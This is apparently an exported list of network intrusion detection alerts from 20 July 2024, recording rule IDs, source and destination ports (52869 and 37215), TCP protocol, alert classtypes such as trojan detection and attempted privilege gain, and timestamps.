                      SID:2025132
                      Source Port:40172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:03.190387
                      SID:2027339
                      Source Port:57884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.190479
                      SID:2027339
                      Source Port:53992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.944258
                      SID:2831300
                      Source Port:54796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.421092
                      SID:2027339
                      Source Port:37104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.860933
                      SID:2027339
                      Source Port:47730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.454187
                      SID:2027339
                      Source Port:51734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.415863
                      SID:2025132
                      Source Port:41298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.109755
                      SID:2027339
                      Source Port:41030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.789977
                      SID:2027339
                      Source Port:47978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440307
                      SID:2027339
                      Source Port:44810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.572723
                      SID:2027339
                      Source Port:34216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.896657
                      SID:2027339
                      Source Port:53500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:50.079146
                      SID:2027339
                      Source Port:53636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2835222
                      Source Port:41578
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.801547
                      SID:2835222
                      Source Port:58996
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.680161
                      SID:2835222
                      Source Port:50622
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.376608
                      SID:2829579
                      Source Port:36624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.220682
                      SID:2835222
                      Source Port:46988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.233976
                      SID:2027339
                      Source Port:59364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.354373
                      SID:2829579
                      Source Port:51534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.333807
                      SID:2831300
                      Source Port:34484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.334968
                      SID:2027339
                      Source Port:52364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.867545
                      SID:2025132
                      Source Port:56592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.763392
                      SID:2025132
                      Source Port:58792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.264642
                      SID:2027339
                      Source Port:59344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.542034
                      SID:2829579
                      Source Port:32976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.969328
                      SID:2027339
                      Source Port:59080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.069521
                      SID:2829579
                      Source Port:56582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.846905
                      SID:2025132
                      Source Port:40546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.756259
                      SID:2829579
                      Source Port:54206
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.104584
                      SID:2027339
                      Source Port:41088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.974243
                      SID:2027339
                      Source Port:50988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.284179
                      SID:2027339
                      Source Port:40090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.571848
                      SID:2027339
                      Source Port:54914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.501276
                      SID:2025132
                      Source Port:48622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.853184
                      SID:2835222
                      Source Port:50818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861759
                      SID:2835222
                      Source Port:58176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.470552
                      SID:2027339
                      Source Port:45862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.152056
                      SID:2027339
                      Source Port:58178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.472445
                      SID:2027339
                      Source Port:47898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.066021
                      SID:2027339
                      Source Port:50124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.471609
                      SID:2027339
                      Source Port:54360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.511898
                      SID:2025132
                      Source Port:57892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.403074
                      SID:2835222
                      Source Port:40972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:57.758895
                      SID:2027339
                      Source Port:57124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.072385
                      SID:2027339
                      Source Port:54358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.860838
                      SID:2829579
                      Source Port:45300
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.488770
                      SID:2831300
                      Source Port:54574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.340010
                      SID:2025132
                      Source Port:57194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.070077
                      SID:2025132
                      Source Port:54802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.181981
                      SID:2027339
                      Source Port:59056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.190387
                      SID:2027339
                      Source Port:40278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.832778
                      SID:2025132
                      Source Port:33912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.614115
                      SID:2027339
                      Source Port:32886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.525153
                      SID:2027339
                      Source Port:51928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.855567
                      SID:2829579
                      Source Port:54782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.762153
                      SID:2829579
                      Source Port:45754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.268005
                      SID:2027339
                      Source Port:53206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2835222
                      Source Port:38846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.414465
                      SID:2829579
                      Source Port:35132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.412130
                      SID:2829579
                      Source Port:58940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.414465
                      SID:2835222
                      Source Port:52474
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.160884
                      SID:2027339
                      Source Port:34468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.682183
                      SID:2025132
                      Source Port:53506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.271056
                      SID:2027339
                      Source Port:37084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.717999
                      SID:2025132
                      Source Port:45914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2835222
                      Source Port:37174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.402808
                      SID:2025132
                      Source Port:55530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.095402
                      SID:2027339
                      Source Port:39854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.173503
                      SID:2025132
                      Source Port:42370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.417227
                      SID:2831300
                      Source Port:34788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.501401
                      SID:2027339
                      Source Port:55966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.187455
                      SID:2025132
                      Source Port:59662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.500189
                      SID:2831300
                      Source Port:40848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.682183
                      SID:2027339
                      Source Port:43258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.687393
                      SID:2831300
                      Source Port:42090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.536920
                      SID:2025132
                      Source Port:53226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.417792
                      SID:2831300
                      Source Port:33396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:10.391415
                      SID:2027339
                      Source Port:56012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2829579
                      Source Port:59856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.422962
                      SID:2829579
                      Source Port:35444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.445692
                      SID:2027339
                      Source Port:43708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.685490
                      SID:2027339
                      Source Port:56868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.766400
                      SID:2027339
                      Source Port:58292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:10.361471
                      SID:2027339
                      Source Port:37952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.320378
                      SID:2025132
                      Source Port:55006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.514709
                      SID:2027339
                      Source Port:33584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.096786
                      SID:2027339
                      Source Port:57576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:21.395373
                      SID:2831300
                      Source Port:37826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:16.552344
                      SID:2829579
                      Source Port:36374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.105578
                      SID:2835222
                      Source Port:49378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.324561
                      SID:2831300
                      Source Port:54024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.226234
                      SID:2831300
                      Source Port:57676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.856452
                      SID:2025132
                      Source Port:46020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.610603
                      SID:2831300
                      Source Port:36304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.600216
                      SID:2829579
                      Source Port:37772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2835222
                      Source Port:48290
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.006675
                      SID:2027339
                      Source Port:57584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:45.141052
                      SID:2829579
                      Source Port:57648
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.898582
                      SID:2025132
                      Source Port:36892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.672304
                      SID:2829579
                      Source Port:40378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.899491
                      SID:2027339
                      Source Port:53778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.280682
                      SID:2027339
                      Source Port:36824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.471609
                      SID:2831300
                      Source Port:37284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.347403
                      SID:2831300
                      Source Port:36836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:40.117305
                      SID:2027339
                      Source Port:50408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:05.182532
                      SID:2025132
                      Source Port:52464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.076308
                      SID:2027339
                      Source Port:54338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.248816
                      SID:2027339
                      Source Port:42284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.583817
                      SID:2027339
                      Source Port:50666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.305121
                      SID:2025132
                      Source Port:38982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:51.240850
                      SID:2025132
                      Source Port:40644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.698680
                      SID:2025132
                      Source Port:46898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.063003
                      SID:2027339
                      Source Port:38680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.178719
                      SID:2025132
                      Source Port:40990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.161619
                      SID:2027339
                      Source Port:34590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.557200
                      SID:2835222
                      Source Port:41234
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.974244
                      SID:2025132
                      Source Port:39898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.951134
                      SID:2829579
                      Source Port:40848
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.045663
                      SID:2025132
                      Source Port:45698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2835222
                      Source Port:53692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.451363
                      SID:2831300
                      Source Port:40220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:38.422006
                      SID:2027339
                      Source Port:50720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.093469
                      SID:2027339
                      Source Port:44556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.305121
                      SID:2027339
                      Source Port:60950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.214918
                      SID:2027339
                      Source Port:59998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.237871
                      SID:2829579
                      Source Port:59626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.088778
                      SID:2835222
                      Source Port:49058
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.402123
                      SID:2831300
                      Source Port:52576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.359038
                      SID:2027339
                      Source Port:55280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.169467
                      SID:2831300
                      Source Port:34506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.971654
                      SID:2829579
                      Source Port:47194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.821008
                      SID:2829579
                      Source Port:49548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.658836
                      SID:2025132
                      Source Port:36372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.742007
                      SID:2027339
                      Source Port:56524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.061851
                      SID:2025132
                      Source Port:35764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.520621
                      SID:2027339
                      Source Port:51380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323712
                      SID:2829579
                      Source Port:49472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.106264
                      SID:2027339
                      Source Port:35574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.267873
                      SID:2027339
                      Source Port:49592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.865859
                      SID:2025132
                      Source Port:53442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.392392
                      SID:2027339
                      Source Port:48764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.406980
                      SID:2831300
                      Source Port:42048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.544972
                      SID:2831300
                      Source Port:57330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:29.745087
                      SID:2831300
                      Source Port:56642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.812828
                      SID:2025132
                      Source Port:59956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.285994
                      SID:2829579
                      Source Port:51056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.809291
                      SID:2027339
                      Source Port:52122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.148116
                      SID:2027339
                      Source Port:52190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.081522
                      SID:2027339
                      Source Port:36478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.759276
                      SID:2027339
                      Source Port:60644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2835222
                      Source Port:46882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.120793
                      SID:2835222
                      Source Port:34356
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.965682
                      SID:2831300
                      Source Port:60110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2835222
                      Source Port:42728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.589589
                      SID:2831300
                      Source Port:45096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:23.270832
                      SID:2025132
                      Source Port:47478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.208694
                      SID:2027339
                      Source Port:43618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.601714
                      SID:2025132
                      Source Port:51018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.595920
                      SID:2829579
                      Source Port:44070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.102253
                      SID:2025132
                      Source Port:37920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:54.482380
                      SID:2027339
                      Source Port:44454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.614211
                      SID:2027339
                      Source Port:34954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.397958
                      SID:2025132
                      Source Port:34298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2829579
                      Source Port:48720
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.516035
                      SID:2831300
                      Source Port:46944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.136809
                      SID:2025132
                      Source Port:39274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.454499
                      SID:2027339
                      Source Port:48144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327719
                      SID:2835222
                      Source Port:52330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.526908
                      SID:2835222
                      Source Port:51688
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.857159
                      SID:2829579
                      Source Port:51958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.510666
                      SID:2831300
                      Source Port:44980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.048997
                      SID:2835222
                      Source Port:45080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.781631
                      SID:2027339
                      Source Port:55322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449942
                      SID:2831300
                      Source Port:59306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.898489
                      SID:2025132
                      Source Port:57890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.457721
                      SID:2831300
                      Source Port:36114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.291744
                      SID:2027339
                      Source Port:59718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.435097
                      SID:2835222
                      Source Port:39260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.447173
                      SID:2829579
                      Source Port:33824
                      Destination Port:37215
                      Protocol:TCP
